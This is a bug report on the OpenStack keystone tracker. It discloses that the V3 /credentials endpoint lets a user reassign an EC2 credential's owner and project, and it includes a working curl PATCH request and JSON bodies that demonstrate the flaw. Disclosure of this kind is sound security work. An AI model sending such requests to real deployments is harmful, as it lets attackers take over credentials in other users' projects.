OpenStack Identity (keystone)

  1. Bug #1872733
  2. Comment #0

Comment 0 for bug 1872733

Revision history for this message
kay (kay-diam) wrote : Keystone V3 /credentials endpoint policy logic allows to change credentials owner or target project ID

"_build_target_enforcement" function checks only for "credential_id": https://github.com/openstack/keystone/blob/7bb6314e40d6947294260324e84a58de191f8609/keystone/api/credentials.py#L38

Thus even having a '"identity:update_credential": "rule:cloud_admin or (user_id:%(target.credential.user_id)s)"' policy doesn't prevent a malicious user to create an EC2 credential, then change its owner and project ID, e.g.:

curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{
  "credential": {
    "project_id": "_target_project_id_",
    "user_id": "_target_user_id_"
  }
}'

Additionally it is possible to Create a credential with any existing project_id, though it doesn't have a serious security issue, e.g.:

{
  "credential": {
    "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}",
    "id": "3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f",
    "project_id": "_any_project_id_",
    "type": "ec2",
    "user_id": "_my_user_id_"
  }
}